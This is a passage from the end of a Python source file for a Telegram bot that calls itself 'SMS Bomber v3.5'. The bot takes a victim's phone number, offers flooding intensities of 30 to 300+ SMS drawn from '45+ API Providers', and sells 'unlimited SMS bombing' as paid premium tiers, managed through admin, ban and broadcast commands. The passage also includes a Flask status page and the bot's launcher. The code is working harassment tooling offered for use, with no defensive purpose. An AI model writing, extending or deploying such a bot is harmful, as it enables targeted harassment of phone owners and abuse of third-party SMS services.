        await update.message.reply_text("🚫 You are banned!")
        return
    
    if uid in user_states and user_states[uid].get("state") == "number":
        digits = "".join(filter(str.isdigit, text))
        if len(digits) < 10:
            await update.message.reply_text("❌ Invalid! Example: `01712345678`", parse_mode="Markdown")
            return
        
        user_states[uid]["number"] = digits
        user_states[uid]["state"] = ""
        
        u_current = get_user(uid)
        coins = u_current.get('coins', 0)
        
        await update.message.reply_text(
            f"✅ **Number Set:** `{digits}`\n\n"
            f"🪙 Your coins: {coins} | 🔋 Low = {LOW_SMS_COST} coins\n"
            f"💎 Premium = FREE, unlimited use\n\n"
            f"╔══════════════════════════╗\n"
            f"║  🔋 Low → 30+ SMS       ║\n"
            f"║  ⚡ Medium → 90+ SMS 💎 ║\n"
            f"║  🔥 High → 150+ SMS 💎 ║\n"
            f"║  💀 Extreme → 300+ SMS💎║\n"
            f"╚══════════════════════════╝\n\n"
            f"Choose intensity below:",
            reply_markup=bomb_menu(), parse_mode="Markdown"
        )

# ===== ADMIN COMMANDS =====

async def admin_panel(update, context):
    if not is_admin(update.effective_user.id):
        return
    await update.message.reply_text("👑 **Admin Panel**", reply_markup=admin_menu(), parse_mode="Markdown")

async def add_cmd(update, context):
    if not is_admin(update.effective_user.id):
        return
    args = context.args
    if len(args) < 2:
        await update.message.reply_text("Usage: `/add @username tier`\nTiers: medium, high, extreme", parse_mode="Markdown")
        return
    target = args[0].replace("@","").lower()
    tier = args[1].lower()
    if tier not in ["medium","high","extreme"]:
        await update.message.reply_text("❌ Invalid tier! Use: medium, high, extreme")
        return
    for uid2, udata in load_db().items():
        if udata.get("username","").lower() == target:
            add_paid_tier(uid2, tier)
            await update.message.reply_text(f"✅ **{tier.upper()}** → @{target}")
            try:
                await context.bot.send_message(int(uid2), f"🎉 **{tier.upper()} Premium Activated!**\nUnlimited SMS bombing now! 🤖", parse_mode="Markdown")
            except:
                pass
            return
    await update.message.reply_text(f"❌ @{target} not found. They need to /start first.")

async def remove_cmd(update, context):
    if not is_admin(update.effective_user.id):
        return
    args = context.args
    if not args:
        await update.message.reply_text("Usage: `/remove @username` or `/remove @username tier`", parse_mode="Markdown")
        return
    target = args[0].replace("@","").lower()
    tier = args[1].lower() if len(args) > 1 else None
    for uid2, udata in load_db().items():
        if udata.get("username","").lower() == target:
            remove_paid_tier(uid2, tier)
            await update.message.reply_text(f"✅ Removed @{target}")
            return
    await update.message.reply_text(f"❌ @{target} not found.")

async def ban_cmd(update, context):
    if not is_admin(update.effective_user.id):
        return
    args = context.args
    if not args:
        await update.message.reply_text("Usage: `/ban @username`", parse_mode="Markdown")
        return
    target = args[0].replace("@","").lower()
    for uid2, udata in load_db().items():
        if udata.get("username","").lower() == target:
            update_user(uid2, {"banned": True})
            await update.message.reply_text(f"✅ Banned @{target}")
            try:
                await context.bot.send_message(int(uid2), "🚫 **You have been banned!** Contact admin.")
            except:
                pass
            return
    await update.message.reply_text(f"❌ @{target} not found.")

async def unban_cmd(update, context):
    if not is_admin(update.effective_user.id):
        return
    args = context.args
    if not args:
        await update.message.reply_text("Usage: `/unban @username`", parse_mode="Markdown")
        return
    target = args[0].replace("@","").lower()
    for uid2, udata in load_db().items():
        if udata.get("username","").lower() == target:
            update_user(uid2, {"banned": False})
            await update.message.reply_text(f"✅ Unbanned @{target}")
            try:
                await context.bot.send_message(int(uid2), "✅ **Unbanned!** Welcome back!")
            except:
                pass
            return
    await update.message.reply_text(f"❌ @{target} not found.")

async def broadcast_cmd(update, context):
    if not is_admin(update.effective_user.id):
        return
    msg = " ".join(context.args)
    if not msg:
        await update.message.reply_text("Usage: `/broadcast Your message`", parse_mode="Markdown")
        return
    sent = failed = 0
    for uid2 in load_db():
        try:
            await context.bot.send_message(int(uid2), f"📢 **Announcement**\n\n{msg}\n\n— {ADMIN_USERNAME} | {BOT_MADE_BY}", parse_mode="Markdown")
            sent += 1
        except:
            failed += 1
    await update.message.reply_text(f"📢 Broadcast: ✅ {sent} sent, ❌ {failed} failed")

async def stats_cmd(update, context):
    if not is_admin(update.effective_user.id):
        return
    db = load_db()
    total = len(db)
    paid = sum(1 for u2 in db.values() if u2.get("tier") == "paid")
    banned_count = sum(1 for u2 in db.values() if u2.get("banned"))
    active_today = sum(1 for u2 in db.values() if u2.get("last_bonus_claim") == str(date.today()))
    await update.message.reply_text(
        f"📊 **STATS**\n👥 {total} | 💎 {paid} | 🆓 {total-paid-banned_count} | 🚫 {banned_count} | 🎁 {active_today}",
        parse_mode="Markdown"
    )

# ============================================================
# FLASK WEB SERVER (for Render)
# ============================================================

try:
    from flask import Flask
except ImportError:
    os.system("pip install flask")
    from flask import Flask

flask_app = Flask(__name__)

@flask_app.route('/')
def home():
    return f"""
    <html>
    <head>
        <title>{BOT_NAME}</title>
        <style>
            body {{ background:#0a0a0a; color:#00ff41; font-family:monospace; padding:40px; text-align:center; }}
            h1 {{ color:#ff0040; text-shadow:0 0 20px #ff0040; }}
            .box {{ border:1px solid #00ff41; padding:20px; margin:20px auto; max-width:500px; border-radius:10px; }}
            .green {{ color:#00ff41; }}
            .red {{ color:#ff0040; }}
        </style>
    </head>
    <body>
        <h1>🔥 {BOT_NAME} 🔥</h1>
        <div class="box">
            <p class="green">✅ STATUS: <b>RUNNING 24/7</b></p>
            <p>🤖 {BOT_MADE_BY}</p>
            <p>👤 Admin: {ADMIN_USERNAME}</p>
            <p>🔋 Low = 30+ SMS | 💎 Premium = Unlimited</p>
            <hr>
            <p>🕒 {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}</p>
            <p>📊 Users: {len(load_db())}</p>
        </div>
        <p><small>45+ SMS Providers • UptimeRobot 24/7</small></p>
    </body>
    </html>
    """

@flask_app.route('/ping')
def ping():
    return "pong", 200

# ============================================================
# MAIN
# ============================================================

def run_flask():
    port = int(os.environ.get("PORT", 8080))
    flask_app.run(host="0.0.0.0", port=port, debug=False)

if __name__ == "__main__":
    print(f"""
╔══════════════════════════════════════════╗
║        {BOT_NAME}             ║
║         SMS Bomber v3.5                  ║
║        45+ API Providers                 ║
║        Low = Minimum 30+ SMS             ║
║     {BOT_MADE_BY}      ║
╚══════════════════════════════════════════╝
    """)
    
    if BOT_TOKEN == "YOUR_BOT_TOKEN_HERE":
        print("❌ ERROR: Set your BOT_TOKEN!")
        print("📌 Get it from @BotFather")
        sys.exit(1)
    
    flask_thread = threading.Thread(target=run_flask, daemon=True)
    flask_thread.start()
    print(f"✅ Web server: port {os.environ.get('PORT', 8080)}")
    
    app = Application.builder().token(BOT_TOKEN).build()
    
    app.add_handler(CommandHandler("start", start_cmd))
    app.add_handler(CommandHandler("send", send_cmd))
    app.add_handler(CommandHandler("stop", stop_cmd))
    app.add_handler(CommandHandler("status", status_cmd))
    app.add_handler(CommandHandler("help", help_cmd))
    app.add_handler(CommandHandler("admin", admin_panel))
    app.add_handler(CommandHandler("add", add_cmd))
    app.add_handler(CommandHandler("remove", remove_cmd))
    app.add_handler(CommandHandler("ban", ban_cmd))
    app.add_handler(CommandHandler("unban", unban_cmd))
    app.add_handler(CommandHandler("broadcast", broadcast_cmd))
    app.add_handler(CommandHandler("stats", stats_cmd))
    app.add_handler(CallbackQueryHandler(button_handler))
    app.add_handler(MessageHandler(filters.TEXT & ~filters.COMMAND, msg_handler))
    
    print(f"✅ Bot is LIVE!")
    print(f"👤 Admin: {ADMIN_USERNAME}")
    print(f"📡 Providers: {len(get_providers('01712345678'))}")
    print(f"🔋 Low = Minimum 30+ SMS per use")
    print(f"🔄 Status: RUNNING 24/7")
    print(f"🤖 {BOT_MADE_BY}")
    
    app.run_polling()
